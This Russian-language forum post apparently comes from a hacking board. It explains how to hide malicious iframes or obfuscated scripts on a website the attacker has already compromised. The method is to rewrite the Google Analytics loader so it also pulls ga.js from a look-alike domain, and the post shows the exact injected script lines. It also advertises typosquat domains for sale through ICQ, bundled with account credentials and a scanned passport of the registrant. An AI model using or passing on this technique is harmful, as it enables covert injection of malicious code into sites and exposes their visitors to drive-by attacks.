В этой теме нет ответов

[CryptoService]

Добрый день. Предлагаю Вашему вниманию способ незаметной (от глаз админа и пользователей) вставки любого клиентского кода (HTML, CSS, Javascript итд.). Например, вставка фреймов (iframe) или ссылок — обычно палится админами на крупных ресурсах.

В чем заключается способ и что для этого нужно?

Все очень просто. Нужно иметь доступ к правке HTML кода (например, через шелл, ssh и др.), а также наличие встроенного в тело страницы счетчика Google Analytics (большинство сайтов).

Суть способа заключается в том, что покупается подставной домен, очень похожий по названию на google-analytics.com и вставляется либо вместо него, либо рядом с ним. Тем самым прогрузка кода будет максимально скрыта, так как код данного счетчика не вызывает никаких подозрений у админов и используется на большинстве сайтов. Как пример - откройте исходный код данной страницы (античата) и Вы увидите там код:

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
var gaJsHosts = (("https:" == document.location.protocol) ? "https:" : "http:");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

Его достаточно заменить на:

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
var gaJsHosts = (("https:" == document.location.protocol) ? "https:" : "http:");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
document.write(unescape("%3Cscript src='" + gaJsHost + "google-anayltics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

Или даже просто на:

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
var gaJsHosts = (("https:" == document.location.protocol) ? "https:" : "http:");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-anayltics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

Тем самым подключая фальшивый домен (а с него - файл ga.js с кодом фрейма или чего угодно).

То есть не придется вставлять толстый крипт прямо в исходный код (который обычно занимает относительно не малые размеры). Фрейм / крипт можно просто вставить в файл ga.js, залить на похожий домен, а в коде сайта изменить только 1-2 строки.

Самые смачные и меньше всего палевные домены уже мною зарегистрированы, для покупки обращайтесь по:

ICQ # 352223797

Предоставлю список доменов и цены.

Доменов много, сюда выкладывать не буду. В комплект покупки входит:

— собственно сам домен с регистрацией на год
— все данные доступа к панели регистратора домена
— все данные доступа к емайлу, на который зарегистрирован аккаунт регистратора
— скан пасспорта, на который регистрировался домен
— бонус: в подарок бесплано аккаунт на www.cryptoservice.info с 50 криптами на борту.

На один домен можно повесить далеко не один код / фрейм / ссылку. Могу написать за небольшую дополнительную плату менеджер кодов на подобных доменах. Вставляемая ссылка немного изменится (будет вида google-analytics.com/ga.js?12 вместо google-analytics.com/ga.js)

Примеры:

Как выглядит чистая страница:


Как выглядит, если вставлять фрейм / крипт:


Как выглядит, если использовать способ, указанный выше: